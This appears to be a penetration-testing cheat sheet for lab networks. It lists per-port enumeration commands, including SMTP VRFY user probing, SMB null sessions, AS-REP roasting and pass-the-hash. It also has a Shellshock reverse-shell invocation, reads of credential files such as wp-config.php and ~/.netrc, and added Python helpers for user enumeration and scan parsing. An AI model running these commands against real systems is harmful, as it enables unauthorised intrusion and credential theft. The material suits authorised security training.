…web server ports are not limited to these; look for open HTTP services on any port
…multiple attack vectors
These are the most common ports found in scans…
The following lists port number, use, and effective enumeration tools…
-----------------------------------------------------------------------------
- FIND AVAILABLE NETWORK CONNECTIONS
nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21 - FTP
Try anonymous logins (user anonymous, any password)
-----------------------------------------------------------------------------
25 - SMTP (EMAIL)
telnet 10.11.1.72 25
VRFY user   # 250/252 = name accepted, 550 = unknown; 252 on every name means the server is not checking at all
FINISH SESSION: Ctrl + ] then close (or QUIT at the SMTP prompt)
VULN - SHELLSHOCK - need a valid local email address
python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110 - POP3
143 - IMAP
587 - SMTP SUBMISSION (usually STARTTLS; same commands as 25)
nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110   # -C sends CRLF line endings, which POP3 expects
USER enter-user
PASS enter-pass
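Worked exchange for the VRFY probe above, as an added example that is not part of the original cheat sheet: a small Python client that sends HELO, one VRFY per candidate name and QUIT, parses the reply codes, and classifies the results. It ships with a stub SMTP server (constructed; its banner, hostname and the set of known users are assumptions) so the exchange runs offline; against a real target replace the stub address with the host and port 25.

```python
import socket
import socketserver
import threading

# Constructed: accounts the stub server admits to knowing (assumption).
FAKE_KNOWN_USERS = {"root", "postmaster", "www-data"}


class FakeSmtpHandler(socketserver.StreamRequestHandler):
    """Stand-in SMTP server for offline runs: answers VRFY with 252 for a
    known local user and 550 for anyone else, like a Postfix box with
    disable_vrfy_command = no and populated local_recipient_maps."""

    def handle(self):
        self.wfile.write(b"220 mail.example.test ESMTP Postfix\r\n")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd in ("HELO", "EHLO"):
                self.wfile.write(b"250 mail.example.test\r\n")
            elif cmd == "VRFY":
                if arg.lower() in FAKE_KNOWN_USERS:
                    self.wfile.write(f"252 2.0.0 {arg}\r\n".encode())
                else:
                    msg = (f"550 5.1.1 <{arg}>: Recipient address rejected: "
                           "User unknown in local recipient table\r\n")
                    self.wfile.write(msg.encode())
            elif cmd == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 5.5.2 Error: command not recognized\r\n")


def read_reply(f):
    """Read one SMTP reply. Multi-line replies use '250-' continuation lines
    and end with a '250 ' line. Returns (code, joined text)."""
    lines = []
    while True:
        raw = f.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode(errors="replace").rstrip("\r\n")
        lines.append(line[4:])
        if not (len(line) >= 4 and line[3] == "-"):
            return int(line[:3]), "\n".join(lines)


def vrfy_enum(host, port, users, timeout=5.0):
    """Probe each candidate name with VRFY; return {user: (code, text)}."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        code, banner = read_reply(f)
        if code != 220:
            raise RuntimeError(f"unexpected banner: {code} {banner}")
        s.sendall(b"HELO kali\r\n")
        read_reply(f)
        for user in users:
            s.sendall(f"VRFY {user}\r\n".encode())
            results[user] = read_reply(f)
        s.sendall(b"QUIT\r\n")
        read_reply(f)          # consume the 221 so the server side closes cleanly
    return results


def existing_users(results):
    """2xx (250 or 252) means the server accepted the name; 550/551 means
    unknown. If every probe comes back 252 the server is not verifying
    anything and the technique yields nothing."""
    return sorted(u for u, (code, _) in results.items() if 200 <= code < 300)


def start_fake_server():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSmtpHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_fake_server()   # in the lab: point vrfy_enum at the target and port 25
    res = vrfy_enum("127.0.0.1", srv.server_address[1], ["root", "www-data", "bob"])
    for user, (code, text) in res.items():
        print(f"VRFY {user:<10} -> {code} {text}")
    print("existing:", existing_users(res))
    srv.shutdown()
    srv.server_close()
```

The client deliberately reads the full reply before sending the next command; pipelining VRFYs against a real server makes the code-to-name mapping ambiguous when a reply spans several lines.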
-----------------------------------------------------------------------------
80 / 443 - WEB
dirb / dirbuster / gobuster / nikto / curl
RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464 - KERBEROS (88 = KDC, 464 = kpasswd; another indicator of a DC)
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe   # pass-the-hash over SMB (445), not Kerberos; the password field also accepts LMHASH:NTHASH
-----------------------------------------------------------------------------
111 - RPCBIND / NFS mounts (showmount -e <ip> lists exports, showmount -a <ip> lists who has them mounted)
-----------------------------------------------------------------------------
135 - RPC: Remote Procedure Call
impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445 - SMB (smbmap -H <ip> / smbclient -L //<ip> -N / nmblookup -A <ip> / nbtscan <ip>)
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb <ip> -u <user> -p <pass>   # -u '' -p '' tests a null session
rpcclient -U '' -N <ip>   # null session; then enumdomusers / enumdomgroups / querydominfo
impacket-lookupsid <domain>/<user>:<pass>@<ip>   # RID cycling to list local and domain accounts
enum4linux -a <ip>
---------------------------------------------------------------
CIFS (OLD WIN NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1.1 / SMB3 (SECURE NEGOTIATION, PRE-AUTH INTEGRITY) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433 - MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268 - LDAP / GLOBAL CATALOG (INDICATOR OF DC)
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>   # anonymous bind; many DCs return nothing without credentials
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/ -dc-ip 10.11.1.220 -request -usersfile <userlist> -no-pass   # AS-REP roast accounts without Kerberos pre-auth; with creds use thinc/<user>:<pass> and drop -usersfile / -no-pass
-----------------------------------------------------------------------------
3389 - RDP
rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------
All listed items are separate commands unless otherwise specified…
…if sudo is required, it will let you know
…otherwise, just use the pasted command
sudo nmap -A -T4 -p- -sS -O -oN nmap_10.10.1.299.txt ip
sudo nmap -A -T4 -p- -sS -O -oA nmap_10.10.1.299 ip   # -oA takes a basename and writes .nmap / .gnmap / .xml
sudo nmap -sU --top-ports 100 -vv ip
nmap -sV -vv -p <ports> --script vuln ip
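Added example, not part of the original page: Python that parses nmap greppable (-oG) output, as written by the results.txt sweep at the top of the sheet, and prints the per-port enumeration commands collected above for every open TCP port. The sample -oG text is constructed, the IPs are placeholders, and the <user> / <pass> / <wordlist> / <userlist> fields are left for the operator to fill in; ports not in the table fall back to a plain banner grab so nothing is silently skipped.

```python
# Constructed -oG output for two lab-style hosts (placeholder IPs).
# Fields in greppable output are tab-separated "Key: value" pairs.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -p- -oG results.txt 10.11.1.0/24\n"
    "Host: 10.11.1.72 ()\tStatus: Up\n"
    "Host: 10.11.1.72 ()\tPorts: 22/open/tcp//ssh///, 25/open/tcp//smtp///, "
    "80/open/tcp//http///, 110/open/tcp//pop3///, 139/filtered/tcp//netbios-ssn///"
    "\tIgnored State: closed (65530)\n"
    "Host: 10.11.1.220 ()\tStatus: Up\n"
    "Host: 10.11.1.220 ()\tPorts: 88/open/tcp//kerberos-sec///, 389/open/tcp//ldap///, "
    "445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, "
    "5985/open/tcp//wsman///\tIgnored State: closed (65531)\n"
    "# Nmap done -- 256 IP addresses (2 hosts up) scanned\n"
)

# Port -> enumeration commands, taken from the list on this page.
SMB_CMDS = ["smbmap -H {ip}", "smbclient -L //{ip} -N",
            "nmap --script smb-os-discovery,smb-enum-shares -p139,445 {ip}",
            "enum4linux -a {ip}"]
LDAP_CMDS = ["nmap -sT -Pn -n --open {ip} -p389 --script ldap-rootdse",
             "impacket-GetNPUsers <domain>/ -dc-ip {ip} -request -usersfile <userlist> -no-pass"]
ENUM_COMMANDS = {
    21: ["ftp {ip}   # try anonymous"],
    25: ["nc -nv {ip} 25   # then VRFY <user>"],
    80: ["nikto -h http://{ip}", "gobuster dir -u http://{ip} -w <wordlist>"],
    88: ["# kerberos on {ip}: DC indicator, run the LDAP / AS-REP checks"],
    110: ["nc -nvC {ip} 110   # USER / PASS"],
    111: ["showmount -e {ip}"],
    135: ["impacket-rpcdump {ip}"],
    139: SMB_CMDS, 445: SMB_CMDS,
    389: LDAP_CMDS, 3268: LDAP_CMDS,
    443: ["nikto -h https://{ip}"],
    1433: ["nmap --script ms-sql* -p1433 {ip}"],
    3389: ["rdesktop -u <user> -p <pass> {ip}"],
    5985: ["evil-winrm -u <user> -p <pass> -i {ip}"],
}


def parse_gnmap(text):
    """Return {ip: [(port, proto, state, service), ...]} from -oG text.
    Each Ports entry is port/state/proto/owner/service/rpcinfo/version/."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split()[0]
        entries = hosts.setdefault(ip, [])
        for item in fields.get("Ports", "").split(","):
            item = item.strip()
            if not item:
                continue
            port, state, proto, _owner, service = item.split("/")[:5]
            entries.append((int(port), proto, state, service))
    return hosts


def enumeration_plan(hosts):
    """Map every open TCP port to its commands; filtered/closed ports are
    skipped, duplicate commands (139 and 445 both open) are emitted once."""
    plan = {}
    for ip, entries in hosts.items():
        cmds = []
        for port, proto, state, service in entries:
            if state != "open" or proto != "tcp":
                continue
            templates = ENUM_COMMANDS.get(port) or [
                f"nc -nv {{ip}} {port}   # unmapped service: {service}"]
            for t in templates:
                cmd = t.format(ip=ip)
                if cmd not in cmds:
                    cmds.append(cmd)
        plan[ip] = cmds
    return plan


if __name__ == "__main__":
    for ip, cmds in enumeration_plan(parse_gnmap(SAMPLE_GNMAP)).items():
        print(f"# {ip}")
        for c in cmds:
            print(c)
```

Feed it the real results.txt with `parse_gnmap(open("results.txt").read())`; it only prints the plan, so nothing runs against a target until you paste the lines yourself.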
All commands listed here assume you have a command prompt…
All listed items are separate commands unless otherwise specified…
…this is an MSSQL Practical Injection cheat sheet
…this is another SQL injection sheet
…this is a list of escape characters
…there are plenty more online
-----------------------------------------------------------------------------
cat ~/.bash_history
cat /etc/issue
cat /proc/version
whoami
ifconfig
ip addr
hostname
pwd
ls -alh /var/www/html
cat /var/www/html/wp-config.php   # WordPress DB credentials
Continue reading
-----------------------------------------------------------------------------
SystemInfo
Network Users and Statistics
Firewall
Services and Tasks
Powershell Policy Unrestricted
View Hotfixes
List Domain Controller
Searches on Windows
Find Modules
PowerUp.ps1
Kerberoast
Juicy Potato
Inspect Files and Folders
Directory Enumeration
One-Liner Ping Script
Change Passwords
Unquoted Service Path
Crackmapexec
Brute-Force Examples
Credential Reuse
PsExec Connections
RPC
Remote Desktop
SQL
Common Enumeration Tools
Enable Windows Installer
SAM Dumps
File Transfers
Anti-Virus Evasion
Restart Windows
…this can be done using wireshark
…or the techniques seen below
SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
enum4linux -a ip
nbtscan ip
…keeping this for reference… used in a particular technique for SMB v2
# run in one terminal, then trigger a connection from another (e.g. the smbclient -L listing above)
# the .? gaps let the pattern match "Samba" stored as UTF-16LE (s\0a\0m\0b\0a\0), which is how SMB sends its native OS / LAN manager strings
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
# (packet #10 below is the client's own dialect list; the server's "Samba x.y.z" string shows up in a later match)
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
.....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.
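Added example, not from the page: Python that decodes the SMB1 Negotiate Protocol dialect list seen in the capture above and pulls Samba version strings out of a captured payload whether they are plain ASCII or UTF-16LE at either byte alignment, the same job the ngrep pattern does with its .? gaps but only reporting hits that carry a version number. The request builder, the dialect list and the Session Setup fragment are constructed to match the capture; nothing here touches the network.

```python
import re
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB1_HEADER_LEN = 32

# Constructed: the dialect list the capture above shows smbclient offering
# (the two "SMB 2.*" entries are what let a server answer in SMB2).
SMBCLIENT_DIALECTS = [
    "PC NETWORK PROGRAM 1.0", "MICROSOFT NETWORKS 1.03", "MICROSOFT NETWORKS 3.0",
    "LANMAN1.0", "LM1.2X002", "DOS LANMAN2.1", "LANMAN2.1", "Samba",
    "NT LANMAN 1.0", "NT LM 0.12", "SMB 2.002", "SMB 2.???",
]

# Constructed: tail of a Session Setup AndX response from a Samba server with
# the Unicode flag set: pad byte, NativeOS, NativeLanMan, both UTF-16LE.
SAMBA_SESSION_SETUP_TAIL = (b"\x00" + "Unix".encode("utf-16-le") + b"\x00\x00"
                            + "Samba 4.3.11-Ubuntu".encode("utf-16-le") + b"\x00\x00")


def build_negotiate_request(dialects, pid=0xfeff):
    """NetBIOS-framed SMB_COM_NEGOTIATE request (SMB1) offering `dialects`."""
    header = (SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE])
              + b"\x00\x00\x00\x00"   # NT Status
              + b"\x18"               # Flags: canonical paths, case-insensitive
              + b"\x53\xc8"           # Flags2 (LE 0xc853): unicode, NT status, ext. security
              + b"\x00\x00"           # PIDHigh
              + b"\x00" * 8           # SecurityFeatures
              + b"\x00\x00"           # Reserved
              + b"\xff\xff"           # TID (none yet)
              + struct.pack("<H", pid)
              + b"\x00\x00"           # UID
              + b"\x00\x00")          # MID
    assert len(header) == SMB1_HEADER_LEN
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = header + b"\x00" + struct.pack("<H", len(data)) + data  # WordCount=0, ByteCount
    return b"\x00" + len(body).to_bytes(3, "big") + body           # NBSS session message


def parse_negotiate_dialects(payload):
    """Dialect strings from an SMB1 negotiate *request* (WordCount 0). The
    response has WordCount 17 and only a DialectIndex, so it yields []."""
    off = payload.find(SMB1_MAGIC)
    if off < 0 or payload[off + 4] != SMB_COM_NEGOTIATE:
        return []
    if payload[off + SMB1_HEADER_LEN] != 0:
        return []
    bc_off = off + SMB1_HEADER_LEN + 1
    (bytecount,) = struct.unpack_from("<H", payload, bc_off)
    data = payload[bc_off + 2: bc_off + 2 + bytecount]
    return [chunk.split(b"\x00", 1)[0].decode("ascii", "replace")
            for chunk in data.split(b"\x02") if chunk]


def offers_smb2(dialects):
    return any(d.startswith("SMB 2.") for d in dialects)


_SAMBA_RE = re.compile(r"Samba\s+\d[\w.~+\-]*")


def find_samba_versions(payload):
    """Samba version strings in a payload: ASCII, or UTF-16LE starting at an
    even or an odd byte offset (the pad byte before Unicode strings makes
    the alignment unpredictable in a raw capture)."""
    views = [payload.decode("latin-1"),
             payload.decode("utf-16-le", "ignore"),
             payload[1:].decode("utf-16-le", "ignore")]
    found = []
    for text in views:
        for hit in _SAMBA_RE.findall(text):
            if hit not in found:
                found.append(hit)
    return found


if __name__ == "__main__":
    req = build_negotiate_request(SMBCLIENT_DIALECTS)
    dialects = parse_negotiate_dialects(req)
    print("client offers:", dialects, "| SMB2 capable:", offers_smb2(dialects))
    print("versions in session setup:", find_samba_versions(SAMBA_SESSION_SETUP_TAIL))
```

The bare "Samba" dialect in the client's list is not a version and is correctly ignored; only the server's NativeLanMan string (or an ASCII banner on an older build) produces a hit.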
~/.netrc   # plaintext machine/login/password entries used by ftp and curl; worth reading on a compromised host
ssh user@ip